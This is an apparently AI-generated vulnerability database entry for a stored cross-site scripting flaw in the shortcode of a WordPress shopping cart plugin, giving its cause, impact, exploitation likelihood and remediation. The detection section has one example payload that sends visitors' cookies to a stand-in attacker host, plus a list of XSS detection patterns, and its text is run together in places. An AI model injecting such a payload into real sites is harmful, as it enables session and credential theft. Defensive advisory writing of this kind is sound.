
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0552 is a Stored Cross-Site Scripting (XSS) vulnerability in the Simple Shopping Cart plugin for WordPress, affecting all versions up to and including 5.2.4. The flaw exists in the wpsc_display_product shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on April 4, 2026, and assigned a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The root cause is insufficient input sanitization and output escaping applied to user-supplied attributes passed to the wpsc_display_product shortcode. An authenticated attacker with at least contributor-level WordPress access can embed malicious JavaScript within shortcode attributes in a post or page; the script is then stored server-side and executes in the browser of any user who subsequently visits the affected page. No user interaction beyond page access is required for the payload to trigger (GitHub Advisory, Wordfence).
Successful exploitation allows an authenticated contributor (or higher-privileged user) to persistently inject arbitrary JavaScript into WordPress pages, which executes in the context of any visitor's browser. Potential consequences include session token theft, credential harvesting, unauthorized actions performed on behalf of victims, website defacement, and redirection to malicious external sites. Availability is not directly impacted, but confidentiality and integrity of user sessions and page content are at risk (GitHub Advisory, Wordfence).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (Wordfence). The EPSS score is approximately 0.01% (2nd percentile), indicating a low near-term exploitation probability (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities.
wpsc_display_product shortcode can be inserted.[wpsc_display_product attribute="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or the REST API from contributor-level accounts containing encoded script tags or JavaScript event handlers in shortcode parameters.wp_posts table entries containing wpsc_display_product shortcode attributes with <script>, javascript:, onerror=, onload=, or similar XSS payloads.wpsc_display_product shortcode.wp-content/plugins/wordpress-simple-paypal-shopping-cart/ for unauthorized modifications.Update the Simple Shopping Cart plugin to version 5.2.5 or later, which addresses the vulnerability per the patch committed to the plugin repository (Plugin Changeset). As an interim measure, restrict contributor-level and above access to only fully trusted users, and consider disabling the wpsc_display_product shortcode if it is not actively required. Deploying a Web Application Firewall (WAF) — such as Wordfence — can help detect and block attempts to inject malicious shortcode attributes. Regularly audit posts and pages using this shortcode for unauthorized content modifications (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."